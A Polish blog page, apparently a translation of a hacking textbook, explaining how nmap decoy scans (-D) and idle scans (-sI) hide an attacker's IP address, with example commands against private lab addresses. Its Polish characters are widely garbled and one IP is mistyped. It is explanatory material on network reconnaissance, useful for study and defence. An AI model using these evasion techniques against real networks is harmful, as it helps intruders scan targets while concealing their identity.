Innym sposobem unikni�cia wykrycia jest ukrycie si� w�r�d kilku wabik�w. Ta technika po prostu fa�szuje po��czenia z r�nych adres�w IP wabik�w mi�dzy ka�dym rzeczywistym po��czeniem skanuj�cym port. Odpowiedzi ze sfa�szowanych po��cze� nie s� potrzebne, poniewa� s� po prostu wprowadzaj�ce w b��d. Nale�y jednak u�y� fa�szywych adres�w wabika jako prawdziwe adresy IP �ywych host�w; w przeciwnym razie cel mo�e zosta� przypadkowo zalany SYN. Wabiki mo�na okre�li� w nmap za pomoc� opcji wiersza polecenia -D. Przyk�adowa komenda nmap pokazana poni�ej skanuje IP 192.168.42.72, u�ywaj�c 192.168.42.10 i 192.168.42.11 jako wabik�w. reading @ hacking: ~ / booksrc $ sudo nmap -D 192.168.42.10,192.168.42.11 192.168.42,72

Powr�t

31.08.2020

Skanowanie bezczynne

Skanowanie w trybie bezczynno�ci to spos�b skanowania obiektu docelowego za pomoc� sfa�szowanych pakiet�w z bezczynnego hosta, obserwuj�c zmiany w bezczynnym ho�cie. Osoba atakuj�ca musi znale�� u�yteczny bezczynny host, kt�ry nie wysy�a ani nie odbiera �adnego innego ruchu sieciowego i ma implementacj� TCP, kt�ra generuje przewidywalne identyfikatory IP, kt�re zmieniaj� si� o znany przyrost z ka�dym pakietem. Identyfikatory IP maj� by� unikalne na pakiet na sesj� i s� zwykle zwi�kszane o sta�� kwot�. Przewidywalne identyfikatory IP nigdy nie by�y uwa�ane za zagro�enie bezpiecze�stwa, a skanowanie w trybie bezczynno�ci wykorzystuje to nieporozumienie. Nowsze systemy operacyjne, takie jak najnowsze j�dro Linuksa, OpenBSD i Windows Vista, randomizuj IP ID, ale starsze systemy operacyjne i sprz�t (np. drukarki) zazwyczaj tego nie robi�. Po pierwsze, atakuj�cy otrzymuje bie��cy identyfikator IP bezczynnego hosta, kontaktuj�c si� z pakietem SYN lub niechcianym pakietem SYN / ACK i obserwuj�c identyfikator IP odpowiedzi. Powtarzaj�c ten proces kilka razy, mo�na okre�li� przyrost zastosowany do identyfikatora IP dla ka�dego pakietu. Nast�pnie atakuj�cy wysy�a sfa�szowany pakiet SYN z adresem IP bezczynnego hosta do portu na komputerze docelowym. Jedna z dw�ch rzeczy si� wydarzy, w zale�no�ci od tego, czy ten port na zaatakowanym komputerze nas�uchuje: Je�li ten port nas�uchuje, pakiet SYN / ACK zostanie wys�any z powrotem do bezczynnego hosta. Poniewa� jednak bezczynny host nie wys�a� pocz�tkowego pakietu SYN, ta odpowied� wydaje si� by� niezamawiana na bezczynny host i odpowiada, wysy�aj�c z powrotem pakiet RST. Je�li ten port nie nas�uchuje, komputer docelowy nie wysy�a pakietu SYN / ACK z powrotem do bezczynnego hosta, wi�c bezczynny host nie odpowiada. W tym momencie atakuj�cy ponownie kontaktuje si� z bezczynnym hostem, aby okre�li�, o ile zwi�kszono identyfikator IP. Je�li zwi�kszy� si� tylko o jeden interwa�, �adne inne pakiety nie zosta�y wys�ane przez bezczynny host mi�dzy dwiema kontrolami. Oznacza to, �e port na maszynie docelowej jest zamkni�ty. Je�li identyfikator IP zosta� zwi�kszony o dwa przedzia�y, jeden pakiet, prawdopodobnie pakiet RST, zosta� wys�any przez bezczynn� maszyn� mi�dzy sprawdzeniami. Oznacza to, �e port na maszynie docelowej jest otwarty. Kroki s� zilustrowane na nast�pnej stronie dla obu mo�liwych wynik�w. Oczywi�cie, je�li bezczynny host nie jest naprawd� bezczynny, wyniki b�d� przekrzywione. Je�li na bezczynnym ho�cie jest niewielki ruch, dla ka�dego portu mo�na wys�a� wiele pakiet�w. Je�li wys�anych zostanie 20 pakiet�w, zmiana 20 krok�w przyrostowych powinna wskazywa� na otwarty port, a nie na zamkni�ty port. Nawet je�li istnieje niewielki ruch, taki jak jeden lub dwa pakiety niezwi�zane ze skanowaniem wysy�ane przez bezczynny host, r�nica ta jest wystarczaj�co du�a, aby mo�na j� by�o wykry�. Je�li ta technika jest u�ywana prawid�owo na bezczynnym ho�cie, kt�ry nie ma �adnych mo�liwo�ci rejestrowania, atakuj�cy mo�e skanowa� dowolny cel bez ujawniania swojego adresu IP. Po znalezieniu odpowiedniego bezczynnego hosta tego typu skanowanie mo�na wykona� za pomoc� nmap, u�ywaj�c wiersza polecenia -sI opcja, po kt�rej nast�puje bezczynny adres hosta:

reader@ hacking: ~ / booksrc $ sudo nmap -sI idlehost.com 192.168.42.7

Powr�t

Z Pami�tniczka M�odego Hackerkachacker.pl

Drogi Pami�tniczku …